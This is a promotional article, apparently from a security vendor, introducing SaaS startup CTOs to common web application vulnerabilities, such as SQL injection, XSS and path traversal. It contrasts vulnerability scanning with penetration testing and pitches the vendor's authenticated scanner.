If you are a CTO at a SaaS startup, you are probably already aware that just because you are small doesn't mean you're not on the firing line. The size of a startup does not exempt it from cyber-attacks – that's because hackers constantly scan the internet looking for flaws that they can exploit. Additionally, it takes only one weakness, and your customer data could end up on the internet. It takes many years to build a reputation as a startup – and this can be ruined overnight with a single flaw.

According to recent research from Verizon, web application attacks are involved in 26% of all breaches, and app security is a concern for ¾ of enterprises. This a good reminder that you can't afford to ignore web application security if you want to keep your customer data secure.

**For startups as well as enterprises**

Hacking is increasingly automated and indiscriminate, so startups are just as vulnerable to attack as large enterprises. But no matter where you are on your cybersecurity journey, securing your web apps doesn't need to be difficult. It helps to have a bit of background knowledge, so here's our essential guide to kick-start your web app security testing.

**What are the common vulnerabilities?****1 — SQL injection**

Where attackers exploit vulnerabilities to execute malicious code in your database, potentially stealing or dumping all your data and accessing everything else on your internal systems by backdooring the server.

**2 — XSS (cross-site scripting)**

This is where hackers can target the application's users and enable them to carry out attacks such as installing trojans and keyloggers, taking over user accounts, carrying out phishing campaigns, or identity theft, especially when used with social engineering.

**3 — Path traversal**

These allow attackers to read files held on a system, allowing them to read source code, sensitive protected system files, and capture credentials held within configuration files, and can even lead to remote code execution. The impact can range from malware execution to an attacker gaining full control of a compromised machine.

**4 — Broken authentication**

This is an umbrella term for weaknesses in session management and credential management, where attackers masquerade as a user and use hijacked session IDs or stolen login credentials to access user accounts and use their permissions to exploit web app vulnerabilities.

**5 — Security misconfiguration**

These vulnerabilities can include unpatched flaws, expired pages, unprotected files or directories, outdated software, or running software in debug mode.

**How to test for vulnerabilities?**

Web security testing for applications is usually split into two types – vulnerability scanning and penetration testing:

**Vulnerability scanners** are automated tests that identify vulnerabilities in your web applications and their underlying systems. They're designed to uncover a range of weaknesses in your apps – and are useful because you can run them whenever you want, as a safety mechanism behind the frequent changes you have to make in application development.

**Penetration testing**: these manual security tests are more rigorous, as they're essentially a controlled form of hacking. We recommend you run them alongside scanning for more critical applications, especially those undergoing major changes.

**Go further with 'authenticated' scanning**

Much of your attack surface can be hidden behind a login page. Authenticated web application scanning helps you find vulnerabilities that exist behind these login pages. While automated attacks targeting your external systems are highly likely to impact you at some point, a more targeted attack that includes the use of credentials is possible.

If your application allows anyone on the internet to sign up, then you could easily be exposed. What's more, the functionality available to authenticated users is often more powerful and sensitive, which means a vulnerability identified in an authenticated part of an application is likely to have a greater impact.

Intruder's authenticated web app scanner includes a number of key benefits, including ease of use, developer integrations, false positive reduction, and remediation advice.

**How do I get started?**

Web app security is a journey and can't be 'baked-in' retrospectively to your application just before release. Embed testing with a vulnerability scanner throughout your entire development lifecycle to help find and fix problems earlier.

This approach allows you and your developers to deliver clean and safe code, accelerates the development lifecycle, and improves the overall reliability and maintainability of your application.

Intruder performs reviews across your publicly and privately accessible servers, cloud systems, and endpoint devices to keep you fully protected.

But testing earlier and faster is nearly impossible without automation. Intruder's automated web application scanner is available to try for free before you buy. Sign up to a free trial today and experience it firsthand.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#sql